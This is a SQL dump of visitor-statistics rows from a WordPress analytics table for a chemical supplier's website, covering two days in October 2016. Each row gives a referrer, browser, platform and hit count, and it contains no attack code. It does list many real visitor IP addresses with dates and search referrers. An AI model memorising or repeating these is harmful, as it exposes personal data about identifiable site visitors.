INSERT INTO `wp_statistics_visitor` VALUES (10176, '2016-10-22', 'https://www.google.com/aclk?sa=L&ai=DChcSEwi7n67ewu_PAhWFlX4KHdfPBkcYABAA&sig=AOD64_1FRLQulbdBQ59EbGo97reP_Gu9mQ&rct=j&q=&ved=0ahUKEwj9kqDewu_PAhUJymMKHVRNCnwQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '12.46.189.10', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10177, '2016-10-22', 'https://www.miller-stephenson.com/', 'Safari', 'iPhone', '7.0', '', '199.30.24.253', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10178, '2016-10-22', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.67.193.38', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10179, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '104.199.20.27', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10180, '2016-10-22', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '72.172.193.150', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10181, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '48.0', '', '189.89.125.52', '000', 30, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10182, '2016-10-22', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '198.154.225.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10183, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '21.0.1180.89', '', '35.161.53.40', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10184, '2016-10-22', 'https://ttsgco.blogfa.com/', 'Safari', 'iPhone', '7.0', '', '131.253.27.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10185, '2016-10-22', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '166.62.118.154', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10186, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.34', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10187, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10188, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10189, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 37, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10190, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '26.0.1410.63', '', '79.126.200.71', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10191, '2016-10-23', 'https://www.bing.com/search?q=miller+siliconeoil&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10192, '2016-10-23', 'https://www.miller-stephenson.com/chemicals/lubricants/', 'MSIE', 'Windows', '9.0', '', '204.79.180.102', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10193, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.195.243.52', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10194, '2016-10-23', 'https://expo.spacecomexpo.com/SPC16/Public/eBooth.aspx?IndexInList=35&FromPage=Exhibitors.aspx&ParentBoothID=&ListByBooth=true&BoothID=322899', 'Chrome', 'Windows', '53.0.2785.143', '', '97.83.59.206', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10195, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '176.58.115.37', '000', 37, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10196, '2016-10-23', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '8.0', '', '220.181.51.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10197, '2016-10-23', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '8.0', '', '220.181.51.74', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10198, '2016-10-23', 'https://vykup-avto-krasnodar.ru/', 'MSIE', 'Windows', '6.0', '', '37.115.187.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10199, '2016-10-23', 'https://filmgo.ru/', 'MSIE', 'Windows', '3.02', '', '37.115.187.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10200, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10201, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.30.178.203', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10202, '2016-10-23', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '47.147.191.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10203, '2016-10-23', 'https://www.google.co.kr/', 'Safari', 'iPad', '10.0', '', '111.118.112.163', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10204, '2016-10-23', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '24.193.212.151', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10205, '2016-10-23', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10206, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '49.0.2623.22', '', '59.61.135.64', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10207, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '158.46.94.61', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10208, '2016-10-23', 'https://www.google.com/', 'Chrome', 'Windows', '39.0.2171.71', '', '70.56.48.185', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10209, '2016-10-23', 'https://www.miller-stephenson.com/products/detail.aspx?itemid=41', 'MSIE', 'Windows', '9.0', '', '182.118.22.216', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10210, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10211, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.170', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10212, '2016-10-23', 'https://www.bing.com/search?q=vazo+64&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '69.246.119.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10213, '2016-10-23', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '23.225.4.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10214, '2016-10-23', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '172.247.22.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10215, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.25.121.0', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10216, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '42.96.149.69', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10217, '2016-10-23', 'https://www.miller-stephenson.com', 'XML-RPC', 'Unknown', 'Unknown', '', '42.96.149.69', '000', 970, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10218, '2016-10-23', 'https://www.miller-stephenson.com', 'SalesIntelligent', 'Unknown', 'Unknown', '', '54.204.242.74', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10219, '2016-10-23', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '24.251.26.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10220, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.79.165.238', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10221, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.183.22.132', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10222, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '199.107.68.203', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10223, '2016-10-23', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '199.107.68.203', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10224, '2016-10-23', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '23.225.4.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10225, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '23.92.212.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10226, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '23.0.1271.95', '', '54.91.16.247', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10227, '2016-10-23', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '172.247.22.73', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10228, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.241.24.53', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10229, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.23.43.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10230, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.191.192.152', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10231, '2016-10-23', 'https://www.google.com/', 'Safari', 'iPhone', '600.1.4', '', '108.41.193.70', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10232, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '10.136.1.11', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10233, '2016-10-23', 'https://kollesa.ru/', 'MSIE', 'Windows', '7.0b', '', '46.118.155.22', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10234, '2016-10-23', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '187.227.154.83', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10235, '2016-10-23', 'https://www.miller-stephenson.com', 'SalesIntelligent', 'Unknown', 'Unknown', '', '54.146.131.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10236, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10237, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.24', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10238, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.148', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10239, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10240, '2016-10-23', 'https://www.google.com.ph/', 'Safari', 'iPad', '9.0', '', '180.191.87.246', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10241, '2016-10-23', 'https://www.google.com/', 'Safari', 'Macintosh', '9.0.2', '', '47.154.74.209', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10242, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.111.86.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10243, '2016-10-23', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.92', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10244, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '37.187.56.66', '000', 220, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10245, '2016-10-23', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '71.17.181.222', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10246, '2016-10-23', 'https://www.google.com/search?ei=TEoMWJOLBMKamQHa0IugDA&q=monomer+powders&oq=monomer+powders&gs_l=mobile-gws-serp.3...4524.13085.0.13608.27.23.0.5.5.0.656.3812.5j15j2j5-1.23.0....0...1.1j4.64.mobile-gws-serp..10.16.2120.3..0j41j0i67k1j0i131k1j0i22i30k1j0i8i13i30k1.nEbyWgG_fvU', 'Chrome', 'Android', '44.0.2403.133', '', '50.167.61.154', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10247, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.79.190.103', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10248, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.122.225.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10249, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.187.65.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10250, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10251, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '113.110.208.188', '000', 30, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10252, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '180.253.90.73', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10253, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.200.101.222', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10254, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.85.137.144', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10255, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '203.52.150.84', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10256, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.201.211.189', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10257, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '86.106.45.131', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10258, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.26.164.230', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10259, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '12.0.742.112', '', '94.23.40.23', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10260, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.33.235.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10261, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.39.137.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10262, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.11.128.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10263, '2016-10-23', 'https://www.google.com.au/url?url=https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/ptfe-dryfilm-lubricants/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwieibWYrfDPAhVBwFQKHdSDCi8QFggUMAA&usg=AFQjCNHlXlm_IH06in0RTtr6TKSRrrIjgA', 'MSIE', 'Windows', '8.0', '', '203.6.69.2', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10264, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.105.13.85', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10265, '2016-10-23', 'https://www.miller-stephenson.com/uploadify/uploadify.swf', 'MSIE', 'Windows', '6.0', '', '178.137.88.65', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10266, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '203.173.33.41', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10267, '2016-10-23', 'https://r.search.yahoo.com/_ylt=A0SO8x_FZgxYlSkAv0NXNyoA;_ylu=X3oDMTByMjR0MTVzBGNvbG8DZ3ExBHBvcwM3BHZ0aWQDBHNlYwNzcg--/RV=2/RE=1477236550/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=QHqqZ8t_QO9qRGC9gYwMYWg5FiU-', 'Safari', 'Macintosh', '10.0', '', '73.193.98.28', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10268, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.237.7.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10269, '2016-10-23', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '39.0.2171.95', '', '185.143.231.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10270, '2016-10-23', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '185.143.231.205', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10271, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.25.132.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10272, '2016-10-23', 'https://www.google.es/', 'Safari', 'Macintosh', '10.0', '', '83.49.11.41', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10273, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.180.210.114', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10274, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.96', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10275, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.131.223.44', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10276, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.209.90.206', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10277, '2016-10-23', 'https://www.google.com/', 'Chrome', 'Android', '52.0.2743.98', '', '194.225.232.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10278, '2016-10-23', 'https://ttsgco.blogfa.com/', 'Firefox', 'Windows', '49.0', '', '178.252.135.126', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10279, '2016-10-23', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '39.48.86.189', '000', 29, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10280, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.113.125.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10281, '2016-10-23', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '39.0.2171.95', '', '191.101.93.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10282, '2016-10-23', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '191.101.93.15', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10283, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.148.84.129', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10284, '2016-10-23', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '124.176.54.184', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10285, '2016-10-23', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '99.196.41.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10286, '2016-10-23', 'https://www.google.de/', 'Firefox', 'Windows', '49.0', '', '84.143.54.13', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10287, '2016-10-23', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '45.20.202.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10288, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.217.56.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10289, '2016-10-23', 'https://uwestech.com.sg/index.php?route=product/product&path=4&product_id=51', 'Vivaldi', 'Windows', '1.4.589.38', '', '99.196.41.21', '000', 21, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10290, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10291, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.67.2.175', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10292, '2016-10-23', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '39.0.2171.95', '', '185.158.132.226', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10293, '2016-10-23', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '185.158.132.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10294, '2016-10-23', 'https://www.miller-stephenson.com/product/epon-828/', 'Chrome', 'Android', '52.0.2743.98', '', '194.225.232.21', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10295, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '2.134.96.76', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10296, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.198.39.31', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10297, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.126.213.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10298, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.79.220.81', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10299, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.31.214.251', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10300, '2016-10-23', 'https://www.google.lt/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwiUzqCdx_DPAhWIXiwKHW6tB0sQFggqMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-100%2F&usg=AFQjCNHPJSNGJ7C9DJ0T2ATyYgDAnAeKPA&sig2=G7Yytt6FQbl7vJlxmvJYRg', 'MSIE', 'Windows', '11.0', '', '78.57.224.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10301, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.67.188.216', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10302, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.57.97.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10303, '2016-10-23', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '107.3.95.149', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10304, '2016-10-23', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '108.26.177.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10305, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '145.255.21.249', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10306, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.102.140.116', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10307, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.92.107.26', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10308, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.79.220.208', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10309, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.67.147.195', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10310, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '30.0.1599.69', '', '121.189.37.114', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10311, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.44.173.56', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10312, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.175.250.163', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10313, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10314, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.69', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10315, '2016-10-23', 'https://www.4istoshop.com/dlja-detej/podguzniki/', 'Opera', 'Windows', '8.50', '', '46.118.155.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10316, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '158.255.55.163', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10317, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.173.5.124', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10318, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '27.0', '', '185.7.213.12', '000', 50, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10319, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.81.253.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10320, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.85.249.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10321, '2016-10-23', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '5.1', '', '46.229.173.131', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10322, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.18.139.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10323, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '180.76.15.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10324, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '173.252.121.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10325, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.101.56.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10326, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.26.233.44', '000', 2, 0); 
